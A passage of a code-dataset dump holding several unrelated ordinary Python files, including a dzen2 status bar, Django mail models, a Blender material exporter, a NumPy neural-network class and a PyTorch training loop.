Desired dataset. Used mainly when dealing with subset of events\n k - Number of users to be returned\n Output: Dataframe with the user ids and number of events\n \"\"\"\n df = self.main_df\n\n if eventTypes is not None:\n df = df[df.event.isin(eventTypes)]\n\n df['value'] = 1\n df = df.groupby('user')\n measurement = df.value.sum().sort_values(ascending=False).head(k)\n measurement = pd.DataFrame(measurement).sort_values('value',ascending=False).reset_index()\n return measurement\n\n\n def getUserActivityDistribution(self,eventTypes=None,selectedUser=False):\n \"\"\"\n This method returns the distribution for the users activity (event counts).\n Question #24a\n Inputs: DataFrame - Desired dataset\n eventTypes - (Optional) Desired event type to use\n Output: List containing the event counts per user\n \"\"\"\n if selectedUser:\n df = self.selectedUsers\n else:\n df = self.main_df\n\n if eventTypes is not None:\n df = df[df.event.isin(eventTypes)]\n\n df['value'] = 1\n df = df.groupby('user')\n measurement = df.value.sum().reset_index()\n\n return measurement\n\n\n def getUserPullRequestAcceptance(self,eventTypes=['PullRequestEvent'], thresh=2):\n \"\"\"\n Calculate the proportion of pull requests that are accepted by each user.\n Question #15 (Optional Measurement)\n Inputs: eventTypes: List of event types to include in the calculation (Should be PullRequestEvent).\n thresh: Minimum number of pull requests a user/repo pair must have to be included in the distribution.\n Output: Data frame with the proportion of accepted pull requests for each user\n \"\"\"\n if self.main_df_opt is not None and 'PullRequestEvent' in self.main_df.event.values:\n df = self.main_df_opt.copy()\n\n idx = (self.main_df.event.isin(eventTypes)) & (df.merged.isin([True,False,\"True\",\"False\"]))\n df = df[idx]\n\n #map string labels to booleans while keeping values that are already boolean\n df['merged'] = df['merged'].map({\"False\": False, \"True\": True, False: False, True: True})\n users_repos = self.main_df[idx]\n\n if len(df) == 0:\n return None\n\n #subset on only PullRequest close actions (not opens)\n idx = df['action'] == 'closed'\n closes = df[idx]\n users_repos = users_repos[idx]\n\n #merge pull request columns (action, merged) with main data frame columns\n closes = pd.concat([users_repos,closes],axis=1)\n closes = closes[['user','content','merged']]\n closes['value'] = 1\n\n #add up number of accepted (merged) and rejected pull requests by user and repo\n outcomes = closes.pivot_table(index=['user','content'],values=['value'],columns=['merged'],aggfunc=np.sum).fillna(0)\n\n outcomes.columns = outcomes.columns.get_level_values(1)\n\n outcomes = outcomes.rename(index=str, columns={True: 
\"accepted\", False: \"rejected\"})\n\n for col in ['accepted','rejected']:\n if col not in outcomes.columns:\n outcomes[col] = 0\n\n outcomes['total'] = outcomes['accepted'] + outcomes['rejected']\n outcomes['value'] = outcomes['accepted'] / outcomes['total']\n outcomes = outcomes.reset_index()\n outcomes = outcomes[outcomes['total'] >= thresh]\n\n if len(outcomes.index) > 0:\n #calculate the average acceptance rate for each user across their repos\n measurement = outcomes[['user','value']].groupby('user').mean().reset_index()\n else:\n measurement = None\n else:\n measurement = None\n\n return measurement\n","sub_path":"socialsim_package/socialsim_package/socialsim/measurements/social_activity.py","file_name":"social_activity.py","file_ext":"py","file_size_in_byte":54059,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"26546363","text":"#!/usr/bin/env python3\n\"\"\"\nAuthor : ceciliachow\nDate : 2020-02-06\nPurpose: Rock the Casbah\n\"\"\"\n\nimport argparse\nimport os\nimport sys\n\n# --------------------------------------------------\ndef get_args():\n \"\"\"get args\"\"\"\n\n parser = argparse.ArgumentParser(\n description='Find position of vowel in string',\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n\n parser.add_argument('vowel',\n metavar='str',\n help='A vowel to look for',\n type=str,\n choices=['a', 'e', 'i', 'o', 'u', 'A', 'E', 'I', 'O', 'U'])\n\n parser.add_argument('text',\n metavar='str',\n type=str,\n help='The text to search')\n\n return parser.parse_args()\n\n # --------------------------------------------------\n\n\ndef main():\n \"\"\"main\"\"\"\n args = get_args()\n count = len(args.text)\n\n for x in range(len(args.text)):\n if args.text[x] == args.vowel:\n print(f'Found \"{args.vowel}\" in \"{args.text}\" at index {x}.')\n count = count - 1\n else:\n continue\n\n if count == len(args.text):\n print(f'\"{args.vowel}\" is not found in \"{args.text}\".')\n\n\n# --------------------------------------------------\nif __name__ == '__main__':\n main()\n","sub_path":"assignments/01_strings/vpos.py","file_name":"vpos.py","file_ext":"py","file_size_in_byte":1356,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"455762883","text":"# https://leetcode.com/problems/unique-paths/description/\nclass Solution(object):\n def uniquePaths(self, m, n):\n \"\"\"\n :type m: int\n :type n: int\n :rtype: int\n \"\"\"\n dp = [[-1 for i in range(n)] for _ in range(m)]\n dp[-1][-1] = 1\n for i in reversed(range(m)):\n for j in reversed(range(n)):\n if dp[i][j] == -1:\n dp[i][j] = dp[i][j+1] if j+1 < n else 0\n dp[i][j] += dp[i+1][j] if i+1< m else 0\n return dp[0][0]\n","sub_path":"unique-paths.py","file_name":"unique-paths.py","file_ext":"py","file_size_in_byte":537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"549979314","text":"import os\nimport datetime\nimport time\n\nfrom gmc import color\n\n# ----- ----- ----- ----- ----- ----- ----- ----- ----- ----- ----- ----\n# initialize\n\n# assuming $ herbstclient tag_status\n# \t#1\t:2\t:3\t:4\t.5\t.6\t.7\t.8\t.9\n\n# custom tag names\nTAG_SHOWS = ['一 ichi', '二 ni', '三 san', '四 shi', \n '五 go', '六 roku', '七 shichi', '八 hachi', '九 kyū', '十 jū']\n\n# initialize variable segment\nsegment_windowtitle = '' # empty string\ntags_status = [] # empty list\nsegment_datetime = '' # empty string\n\n# ----- ----- ----- ----- ----- ----- ----- ----- ----- ----- ----- ----\n# 
decoration\n\nSEPARATOR = '^bg()^fg(' + color['black'] + ')|^bg()^fg()'\n\n# http://fontawesome.io/\nFONT_AWESOME = '^fn(FontAwesome-9)'\n\n# Powerline Symbol\nRIGHT_HARD_ARROW = '^fn(powerlinesymbols-14)^fn()'\nRIGHT_SOFT_ARROW = '^fn(powerlinesymbols-14)^fn()'\nLEFT_HARD_ARROW = '^fn(powerlinesymbols-14)^fn()'\nLEFT_SOFT_ARROW = '^fn(powerlinesymbols-14)^fn()'\n\n# theme\nPRE_ICON = '^fg(' + color['yellow500'] + ')' + FONT_AWESOME\nPOST_ICON = '^fn()^fg()'\n\n# ----- ----- ----- ----- ----- ----- ----- ----- ----- ----- ----- ----\n# main\n\ndef get_statusbar_text(monitor):\n text = ''\n\n # draw tags\n for tag_status in tags_status:\n text += output_by_tag(monitor, tag_status)\n\n # draw date and time\n text += output_by_datetime()\n\n # draw window title\n text += output_by_title()\n \n return text\n\n# ----- ----- ----- ----- ----- ----- ----- ----- ----- ----- ----- ----\n# each segments\n\ndef output_by_tag(monitor, tag_status):\n tag_index = tag_status[1:2]\n tag_mark = tag_status[0:1]\n tag_name = TAG_SHOWS[int(tag_index) - 1] # zero based\n\n # ----- pre tag\n\n if tag_mark == '#':\n text_pre = '^bg(' + color['blue500'] + ')' \\\n '^fg(' + color['black'] + ')' \\\n + RIGHT_HARD_ARROW \\\n + '^bg(' + color['blue500'] + ')' \\\n '^fg(' + color['white'] + ')'\n elif tag_mark == '+':\n text_pre = '^bg(' + color['yellow500'] + ')' \\\n '^fg(' + color['grey400'] + ')'\n elif tag_mark == ':':\n text_pre = '^bg()^fg(' + color['white'] + ')'\n elif tag_mark == '!':\n text_pre = '^bg(' + color['red500'] + ')' \\\n '^fg(' + color['white'] + ')'\n else:\n text_pre = '^bg()^fg(' + color['grey600'] + ')'\n\n \n # ----- tag by number\n \n # assuming using dzen2_svn\n # clickable tags if using SVN dzen\n text_name = '^ca(1,herbstclient focus_monitor \"' \\\n + str(monitor) + '\" && ' + 'herbstclient use \"' \\\n + tag_index + '\") ' + tag_name + ' ^ca() '\n \n # ----- post tag\n\n if tag_mark == '#':\n text_post = '^bg(' + color['black'] + ')' \\\n '^fg(' + color['blue500'] + ')' + RIGHT_HARD_ARROW\n else: \n text_post = ''\n \n return (text_pre + text_name + text_post)\n\ndef output_by_title():\n text = ' ^r(5x0) ' + SEPARATOR + ' ^r(5x0) '\n text += segment_windowtitle\n\n return text\n\ndef output_by_datetime():\n text = ' ^r(5x0) ' + SEPARATOR + ' ^r(5x0) '\n text += segment_datetime\n\n return text\n\n# ----- ----- ----- ----- ----- ----- ----- ----- ----- ----- ----- ----\n# setting variables, response to event handler\n\ndef set_tag_value(monitor):\n global tags_status\n\n raw = os.popen('herbstclient tag_status ' + str(monitor)).read()\n raw = raw.strip()\n tags_status = raw.split(\"\\t\")\n\ndef set_windowtitle(windowtitle):\n global segment_windowtitle\n icon = PRE_ICON + '' + POST_ICON\n \n segment_windowtitle = ' ' + icon + \\\n ' ^bg()^fg(' + color['grey700'] + ') ' + windowtitle\n\ndef set_datetime():\n global segment_datetime\n now = datetime.datetime.now()\n \n date_icon = PRE_ICON + '' + POST_ICON\n date_format = '{0:%Y-%m-%d}'\n date_str = date_format.format(now)\n date_text = date_icon + ' ^bg()' \\\n + '^fg(' + color['grey700'] + ') ' + date_str\n\n time_icon = PRE_ICON + '' + POST_ICON \n time_format = '{0:%H:%M:%S}'\n time_str = time_format.format(now)\n time_text = time_icon +' ^bg()' \\\n + '^fg(' + color['blue500'] + ') ' + time_str\n\n segment_datetime = date_text + ' ' + 
time_text\n","sub_path":"standalone/dzen2-hlwm/python/output.py","file_name":"output.py","file_ext":"py","file_size_in_byte":4272,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"}
+{"seq_id":"119643921","text":"'''\n\nmodels for the ifxmail application; based on odymail\n\ncreated on 11/25/2018\n@author: Aaron Kitzmiller \n@copyright: 2018 The Presidents and Fellows of Harvard College. All rights reserved.\n\n@license: GPL v2.0\n'''\nfrom django.db import models\nfrom author.decorators import with_author\n\n\n@with_author\nclass IfxMessage(models.Model):\n '''\n Model class for standard mail message text.\n '''\n class Meta:\n db_table = \"ifxmessage\"\n\n name = models.CharField(max_length=100, blank=False, unique=True, default=None)\n subject = models.CharField(max_length=500, blank=False, default=None)\n message = models.TextField(blank=False)\n application = models.CharField(max_length=20, blank=False, null=False, default='nice')\n created = models.DateTimeField(auto_now_add=True)\n updated = models.DateTimeField(auto_now=True)\n\n def __str__(self):\n return self.name\n\n\n@with_author\nclass IfxMailing(models.Model):\n '''\n Model class for a particular mailing.\n Includes message text, list of emails, etc.\n May be linked to rcuser objects\n '''\n class Meta:\n db_table = \"ifxmailing\"\n\n # Comma separated list of email addresses\n # for to, from, cc, bcc\n tostr = models.TextField(blank=False, null=False, default=None)\n fromstr = models.CharField(max_length=100, blank=False, null=False, default=None)\n ccstr = models.TextField(null=True, blank=True)\n bccstr = models.TextField(null=True, blank=True)\n replyto = models.CharField(max_length=100, blank=True, null=True)\n subject = models.CharField(max_length=1000, blank=False, null=False, default=None)\n message = models.TextField(blank=False, null=False, default=None)\n created = models.DateTimeField(auto_now_add=True)\n updated = models.DateTimeField(auto_now=True)\n sent = models.DateTimeField(blank=True, null=True, default=None)\n status = models.CharField(max_length=20, blank=False, default='READY')\n ifxmessage = models.ForeignKey(IfxMessage, blank=True, null=True, default=None, on_delete=models.CASCADE)\n application = models.CharField(max_length=20, blank=False, null=False, default='nice')\n\n def getAttachmentFiles(self):\n '''\n Returns an array of attachment FieldFiles from the IfxMailing via IfxMessage\n '''\n files = []\n if self.ifxmessage:\n for ma in self.ifxmessage.ifxmessageattachment_set.all():\n files.append(ma.file)\n\n return files\n\n\nclass IfxMessageAttachment(models.Model):\n \"\"\"\n Attachment for IfxMessages\n \"\"\"\n\n class Meta:\n db_table = 'ifxmessage_attachment'\n\n name = models.CharField(max_length=100, blank=False, null=False, default=None, unique=True)\n file = models.FileField(upload_to=\"uploads/%Y/%m/%d/\")\n ifxmessage = models.ForeignKey(IfxMessage, on_delete=models.CASCADE)\n\n def __str__(self):\n return '%s - %s' % (self.name, self.file)\n","sub_path":"ifxmail/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2946,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"}
+{"seq_id":"139376323","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\n@Author: Xiaolele11\n@Time: 2019-01-28 15:20\n@File : pic_read.py\n@Desc : Read an image with OpenCV\n\"\"\"\n\nimport cv2 as cv\n\n# Read the image\nimg = cv.imread('/Users/jiale/github/ai/data/test.jpg')\n# Image info\nprint('Image size:', img.shape)\nprint('Image data:', type(img), img)\n# Show the image\ncv.imshow('pic title', img)\ncv.waitKey(0)\n\n# Add text\ncv.putText(img, 'Learn Python with Crossin', (50, 150), cv.FONT_HERSHEY_SIMPLEX, 1, (255, 255, 255), 4)\n# Save the image\ncv.imwrite('img/Lenna_new.png', img)\n","sub_path":"opencv_test/pic_read.py","file_name":"pic_read.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"}
+{"seq_id":"207718108","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nimport bpy\nfrom bpy_extras.io_utils import ExportHelper\nfrom bpy.props import BoolProperty, StringProperty, EnumProperty, IntProperty, CollectionProperty, FloatProperty\nfrom ..material import MHMat\nfrom ..utils import hasMaterial, blendMatSave\n\nclass MHS_OT_WriteMaterialOperator(bpy.types.Operator, ExportHelper):\n \"\"\"Write material to MHMAT file\"\"\"\n bl_idname = \"makeskin.write_material\"\n bl_label = \"Write material\"\n bl_options = {'REGISTER'}\n\n filename_ext = '.mhmat'\n\n filter_glob: StringProperty(default='*.mhmat', options={'HIDDEN'})\n\n @classmethod\n def poll(self, context):\n if context.active_object is not None:\n if not hasattr(context.active_object, \"MhObjectType\"):\n return False\n return True\n return False\n\n def execute(self, context):\n\n obj = context.active_object\n\n fnAbsolute = bpy.path.abspath(self.filepath)\n\n if not hasMaterial(obj):\n self.report({'ERROR'}, \"Object does not have a material\")\n return {'FINISHED'}\n\n mhmat = MHMat(obj)\n\n if obj.MhMsName:\n mhmat.settings['name'] = obj.MhMsName\n\n if obj.MhMsTag:\n mhmat.settings['tag'] = obj.MhMsTag\n\n if obj.MhMsDescription:\n mhmat.settings['description'] = obj.MhMsDescription\n\n if obj.MhMsAuthor:\n mhmat.settings['author'] = obj.MhMsAuthor\n\n if obj.MhMsHomepage:\n mhmat.settings['homepage'] = obj.MhMsHomepage\n\n mhmat.settings['license'] = obj.MhMsMatLicense\n mhmat.settings['backfaceCull'] = obj.MhMsBackfaceCull\n mhmat.settings['castShadows'] = obj.MhMsCastShadows\n mhmat.settings['receiveShadows'] = obj.MhMsReceiveShadows\n mhmat.settings['alphaToCoverage'] = obj.MhMsAlphaToCoverage\n mhmat.settings['shadeless'] = obj.MhMsShadeless\n mhmat.settings['wireframe'] = obj.MhMsWireframe\n mhmat.settings['transparent'] = obj.MhMsTransparent\n mhmat.settings['depthless'] = obj.MhMsDepthless\n mhmat.settings['sssEnable'] = obj.MhMsSSSEnable\n mhmat.settings['writeBlendMaterial'] = obj.MhMsWriteBlendMaterial\n\n handling = \"NORMALIZE\"\n if obj.MhMsTextures:\n handling = obj.MhMsTextures\n if handling == \"NORMALIZE\":\n mhmat.copyTextures(fnAbsolute)\n if handling == \"COPY\":\n mhmat.copyTextures(fnAbsolute,normalize=False)\n # If handling is LINK, then paths are already correct\n\n if mhmat.settings[\"normalmapTexture\"]:\n mhmat.shaderConfig[\"normal\"] = True\n if mhmat.settings[\"bumpmapTexture\"]:\n mhmat.shaderConfig[\"bump\"] = True\n if obj.MhMsUseLit and obj.MhMsLitsphere:\n mhmat.litSphere = obj.MhMsLitsphere\n\n ##- Save blend -##\n if mhmat.settings[\"writeBlendMaterial\"]:\n try:\n matName = obj.material_slots[1].name\n except IndexError:\n msg = \"Object does not have a second material.\"\n self.report({'ERROR'}, msg)\n raise IndexError(msg)\n\n from pathlib import Path\n path = Path(fnAbsolute).with_suffix('.mat.blend')\n mhmat.settings[\"blendMaterial\"] = path.name+'/materials/'+matName\n blendMatSave(path)\n\n\n with open(fnAbsolute,'w') as f:\n f.write(str(mhmat))\n print(mhmat)\n self.report({'INFO'}, \"A material file was written\")\n\n return 
{'FINISHED'}\n\n","sub_path":"makeskin/operators/writematerial.py","file_name":"writematerial.py","file_ext":"py","file_size_in_byte":3544,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"63024946","text":"import pandas as pd\nimport numpy as np\nimport seaborn as sns\nimport pandas as pd\nimport os\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom random import random, seed, randint\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import OneHotEncoder\nfrom sklearn.compose import ColumnTransformer\nfrom sklearn.preprocessing import StandardScaler, OneHotEncoder\nfrom sklearn.metrics import confusion_matrix, accuracy_score, roc_auc_score\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.datasets import load_breast_cancer\nfrom sklearn.decomposition import PCA\nfrom sklearn.preprocessing import StandardScaler\n\ncancer = load_breast_cancer()\n\nnp.random.seed()\ntrainingShare = 0.9\nseed = 1\n\nXTrain, XTest, yTrain, yTest=train_test_split(cancer.data,cancer.target, train_size=trainingShare, \\\n test_size = 1-trainingShare,\n random_state=seed)\nyTrain = np.ravel(yTrain).reshape(-1,1)\nyTest = np.ravel(yTest).reshape(-1,1)\n\n# Input Scaling\nsc = StandardScaler()\nXTrain = sc.fit_transform(XTrain)\nXTest = sc.transform(XTest)\n#PCA dimensionality reduction\n'''\nscaler = StandardScaler()\npca = PCA(n_components=2)\nXTrain= pca.fit(XTrain).transform(XTrain)\nXTest = pca.fit(XTest).transform(XTest)'''\n\nclass Network:\n def __init__(self,Xdata,Ydata,act_func = 'ELU',type_net = 'regression', sizes = [64,64], eta=0.001, lmbd = 0.01, num_iter= 100, n_epochs = 200, batch_size = 20):\n self.eta = eta #Learning rate\n self.num_iter = num_iter #Number of iterations\n #Parameters needed for stochastoc gradient\n self.n_epochs = n_epochs\n row, col = XTrain.shape\n tot_num_samples = row\n self.batch_size = batch_size\n self.batches = int(tot_num_samples/batch_size)\n #Activation function\n self.act_func = act_func\n #Type of network\n self.type_net = type_net\n #Data\n self.Xdata =Xdata\n self.Ydata =Ydata\n self.sizes = sizes #Number of layers\n self.lmbd = lmbd #Regularization parameter\n #Definition of some parameters first for weights and bias\n self.column = [col]\n self.column1 =[int(i) for i in self.column]\n sizes = [int(i) for i in self.sizes]\n self.list0 = np.append(self.column1, self.sizes)\n self.list = np.append(self.list0,1)\n self.list2 = self.list[:-1]\n self.list3 = self.list[1:]\n #Make a loop for weights and biases\n self.listWeights = []\n self.biasesList = []\n for j, columns in enumerate(self.list2):\n #for rows in list3:\n rows = self.list3[j]\n weights = np.zeros((len(self.list2),len(self.list3)))\n weights = np.random.randn(columns, rows)\n self.listWeights.append(weights)\n bias = np.zeros((len(self.list3)))\n bias = np.random.randn(rows)\n self.biasesList.append(bias)\n def sigmoid(self, z):\n return 1/(1 + np.exp(-z))\n #Derivative of sigmoid\n def sigmoid_prime(self,z):\n #Derivative of sigmoid function\n return self.sigmoid(z)*(1-self.sigmoid(z))\n #Definition of tanh function\n def tanh(self,z):\n return np.tanh(z)\n #Derivative of tanh function\n def derivtanh(self,z):\n return (1-(np.tanh(z)**2))\n #Definition of RELU\n def RELU(self, z):\n if (z.all() < 0):\n return 0\n else:\n return z\n #Derivative of RELU function\n def derivRELU(self, z):\n if (z.all() < 0):\n return 0\n else:\n return 1\n #Definition of ELU\n def ELU(self,z):\n if (z.all()<0):\n 
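# NOTE (editor): z.all() returns a single boolean, so the comparison z.all() < 0\n # is always False and this branch is effectively unreachable for array input; an\n # element-wise ELU would be np.where(z < 0, alpha * (np.exp(z) - 1.0), z).\n 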
alpha = 1.0 #ELU scale parameter; 1.0 is the conventional default\n return alpha*(np.exp(z)-1)\n else:\n return z\n #Derivative of ELU\n def derivELU(self,z):\n if (z.all() < 0):\n return (np.exp(z))\n else:\n return 1\n #Return partial derivative of the cost with respect to the activations\n def cost_derivative(self, output_activations, Ydata):\n #squared-error derivative for regression, cross-entropy derivative otherwise\n if (self.type_net) == 'Regression':\n return (output_activations - Ydata)\n else:\n return (output_activations - Ydata)/(output_activations*(1-output_activations))\n #Feed forward\n def feed_forward_train(self,):\n #Define my activation function\n activation = self.Xdata\n zs = []\n ac = [self.Xdata]\n for j, i in enumerate(self.listWeights):\n hidden_bias = self.biasesList[j]\n z = activation@i + hidden_bias\n #z_o = np.matmul(a_h, output_weights) + output_bias\n #z = np.matmul(activation.T, i) + hidden_bias\n zs.append(z) #store the weighted inputs for backpropagation\n #Specify which activation to use\n if (self.act_func) == 'tanh':\n activation = self.tanh(z)\n elif (self.act_func) == 'RELU':\n activation = self.RELU(z)\n elif (self.act_func) == 'ELU':\n activation = self.ELU(z)\n else:\n activation = self.sigmoid(z)\n ac.append(activation) # Create list for my activations\n return (ac, activation, zs)\n #Back propagation for gradient descent\n def backpropagation(self,):\n #Create the gradients layer by layer.\n nabla_w = [] # Create an empty list for the weight gradients\n nabla_b = [] # Create an empty list for the bias gradients\n for j, i in enumerate(self.listWeights):\n hidden_bias = self.biasesList[j]\n b = np.zeros(hidden_bias.shape)\n w = np.zeros(i.shape)\n nabla_b.append(b)\n nabla_w.append(w)\n #insert values from my feed_forward\n ac, output, zs = self.feed_forward_train()\n #error in output layer\n #Specify which activation to use\n\n if (self.act_func) == 'tanh':\n deriv = self.derivtanh(zs[-1])\n elif (self.act_func) == 'RELU':\n deriv = self.derivRELU(zs[-1])\n elif (self.act_func) == 'ELU':\n deriv = self.derivELU(zs[-1])\n else:\n deriv = self.sigmoid_prime(zs[-1])\n\n delta = self.cost_derivative(ac[-1],self.Ydata) * deriv\n #delta = (ac[-1] - self.Ydata)\n error = delta\n # Gradient bias for output layer\n nabla_b[-1] = np.sum(delta)\n #Gradient weight for weights\n nabla_w[-1] = np.dot(ac[-2].T,delta)\n #calculate gradient for hidden layers\n deltas = [error]\n for l in range(2, len(ac)):\n z = zs[-l]\n if (self.act_func) == 'tanh':\n deriv = self.derivtanh(z)\n elif (self.act_func) == 'RELU':\n deriv = self.derivRELU(z)\n elif (self.act_func) == 'ELU':\n deriv = self.derivELU(z)\n else:\n deriv = self.sigmoid_prime(z)\n sp = deriv\n delta = np.dot(delta,self.listWeights[-l+1].T)*sp\n nabla_b[-l] = np.sum(delta)\n nabla_w[-l] = np.dot(ac[-l-1].T,delta)\n deltas.append(delta)\n return (nabla_b, nabla_w) # consumed by the gradient-descent updates\n #Implement a backpropagation for stochastic gradient descent\n def backpropagation_stochastic(self,):\n #Create the gradients layer by layer.\n nabla_w = [] # Create an empty list for the weight gradients\n nabla_b = [] # Create an empty list for the bias gradients\n for j, i in enumerate(self.listWeights):\n hidden_bias = self.biasesList[j]\n b = np.zeros(hidden_bias.shape)\n w = np.zeros(i.shape)\n nabla_b.append(b)\n nabla_w.append(w)\n #insert values from my feed_forward\n ac, output, zs = self.feed_forward_output(self.Xdata1)\n #error in output layer\n if (self.act_func) == 'tanh':\n deriv = self.derivtanh(zs[-1])\n elif (self.act_func) == 'RELU':\n 
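# (editor note) each branch selects the derivative of the configured activation,\n # evaluated at zs[-1] -- the pre-activation of the output layer saved during the\n # forward pass -- to form the output-layer error delta.\n 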
deriv = self.derivRELU(zs[-1])\n elif (self.act_func) == 'ELU':\n deriv = self.derivELU(zs[-1])\n else:\n deriv = self.sigmoid_prime(zs[-1])\n\n delta = self.cost_derivative(ac[-1],self.Ydata1) * deriv\n # Gradient bias for output layer\n nabla_b[-1] = np.sum(delta)\n #Gradient weight for weights\n nabla_w[-1] = np.dot(ac[-2].T,delta)\n #calculate gradient for hidden layers\n for l in range(2, len(ac)):\n z = zs[-l]\n if (self.act_func) == 'tanh':\n deriv = self.derivtanh(z)\n elif (self.act_func) == 'RELU':\n deriv = self.derivRELU(z)\n elif (self.act_func) == 'ELU':\n deriv = self.derivELU(z)\n else:\n deriv = self.sigmoid_prime(z)\n sp = deriv\n delta = np.dot(delta,self.listWeights[-l+1].T)*sp\n nabla_b[-l] = np.sum(delta)\n nabla_w[-l] = np.dot(ac[-l-1].T,delta)\n #deltas.append(delta)\n return (nabla_b, nabla_w) # I shall put values in stochastic gradient\n #Fitting with stochastic gradient descent\n def fitstoc(self,):\n \trow, col = self.Xdata.shape\n \tdata_indices = np.arange(col) # Define my features\n \tfor epoch in range(self.n_epochs):\n for i in range(self.batches):\n \tchosen_datapoints = np.random.choice(data_indices, size=self.batch_size, replace=False)\n \tself.Xdata1 = self.Xdata[chosen_datapoints]\n \tself.Ydata1 = self.Ydata[chosen_datapoints]\n \tnabla_b, nabla_w = self.backpropagation_stochastic()\n \tfor m, l in enumerate(self.biasesList):\n \t\tdb = nabla_b[m]\n \t\tl -=self.eta*db\n \tdw = []\n \tfor j, k in enumerate(self.listWeights):\n \t\tdwh = nabla_w[j]\n \t\tdwh +=self.lmbd*k\n \t\tdw.append(dwh) # Creat a list for regularized weights\n \t\tk -=self.eta*dwh\n def fitgradient(self,):\n #Define parameters\n for i in range(self.num_iter):\n nabla_b, nabla_w = self.backpropagation()\n for m, l in enumerate(self.biasesList):\n db = nabla_b[m]\n l -= self.eta*db\n dw = []\n for j, k in enumerate(self.listWeights):\n dwh = nabla_w[j]\n dwh += self.lmbd*k\n dw.append(dwh) # Creat a list for regularized weights\n k -=self.eta*dwh\n\n def feed_forward_output(self, XTest):\n #Define my activation function\n activation = XTest\n zs = []\n ac = [XTest]\n for j, i in enumerate(self.listWeights):\n hidden_bias = self.biasesList[j]\n z = activation@i + hidden_bias\n zs.append(z) # Creat list for weighted sum of inputs.\n if (self.act_func) == 'tanh':\n activation = self.tanh(z)\n elif (self.act_func) == 'RELU':\n activation = self.RELU(z)\n elif (self.act_func) == 'ELU':\n activation = self.ELU(z)\n else:\n activation = self.sigmoid(z) #\n ac.append(activation) # Create list for my activations\n return(ac, activation, zs)\n\n def predict(self, XTRAIN,yTRAIN):\n #Call for activation function and call it ypredict\n ac, ypredict, zs = self.feed_forward_output(XTRAIN)\n row, col = ypredict.shape\n #Creat an empty list for my prediction\n\n C = []\n for i in range(0, row):\n if ypredict[i] > 0.5:\n C.append(1)\n else:\n C.append(0)\n #Empty list for testing\n a = []\n C = np.ravel(C).reshape(-1,1)\n for i in range(0, row):\n if C[i] == yTRAIN[i]:\n a.append(1)\n return(len(a)/row)\n #Calculating R2 score\n","sub_path":"SourceCode/CancerData/Neural Network/NN_class.py","file_name":"NN_class.py","file_ext":"py","file_size_in_byte":12032,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"389957084","text":"import time, copy, torch\n\ndef train_model(model, dataloader, criterion, optimiser, scheduler, device, dataset_size, num_epochs=10):\n try:\n since = time.time()\n\n best_model_wts = copy.deepcopy(model.state_dict())\n 
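# (editor note) snapshotting the weights up front guarantees that load_state_dict\n # in the KeyboardInterrupt handler below always has a valid checkpoint, even if\n # training stops before the first validation improvement.\n 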
best_acc = 0.0\n\n for epoch in range(num_epochs):\n print(f'Epoch {epoch+1}/{num_epochs}')\n\n for phase in ['train', 'valid']:\n if phase == 'train':\n scheduler.step()\n model.train()\n else:\n model.eval()\n\n running_loss = 0.0\n running_corrects = 0\n\n for data in dataloader[phase]:\n images, metadata, labels = data['image'], data['metaData'], data['label']\n images = images.to(device)\n metadata = metadata.to(device)\n labels = labels.to(device)\n\n optimiser.zero_grad()\n\n with torch.set_grad_enabled(phase=='train'):\n outputs = model((images, metadata))\n _, preds = torch.max(outputs, 1)\n loss = criterion(outputs, labels)\n\n if phase == 'train':\n loss.backward()\n optimiser.step()\n temp1 = loss.item() * images.size(0)\n temp2 = torch.sum(preds==labels.data)\n running_loss += temp1\n running_corrects += temp2\n print('Running loss:{:.4f} Acc: {:.2f}'.format(temp1/images.size(0), temp2*100/images.size(0)), end='\\r')\n epoch_loss = running_loss/dataset_size[phase]\n epoch_acc = running_corrects.double()/dataset_size[phase]\n print('{} Loss: {:.4f} Acc: {:.4f}'.format(phase, epoch_loss,\n epoch_acc*100))\n\n if phase == 'valid' and epoch_acc > best_acc:\n best_acc = epoch_acc\n best_model_wts = copy.deepcopy(model.state_dict())\n print('--' * 20)\n print()\n\n time_elapsed = time.time() - since\n print('Training completed in {:.0f}m {:.0f}s'.format(\n time_elapsed//60, time_elapsed%60))\n print('Best valid Acc: {:.4f}'.format(best_acc))\n\n model.load_state_dict(best_model_wts)\n except KeyboardInterrupt:\n model.load_state_dict(best_model_wts)\n time_elapsed = time.time() - since\n print('Training completed in {:.0f}m {:.0f}s'.format(\n time_elapsed//60, time_elapsed%60))\n print('Best valid Acc: {:.4f}'.format(best_acc))\n return model\n return model","sub_path":"fit_model.py","file_name":"fit_model.py","file_ext":"py","file_size_in_byte":2846,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"}
+{"seq_id":"653538027","text":"# coding: utf-8\n\n\"\"\"\n BIMData API\n\n BIMData API is a tool to interact with your models stored on BIMData’s servers. Through the API, you can manage your projects, the clouds, upload your IFC files and manage them through endpoints. 
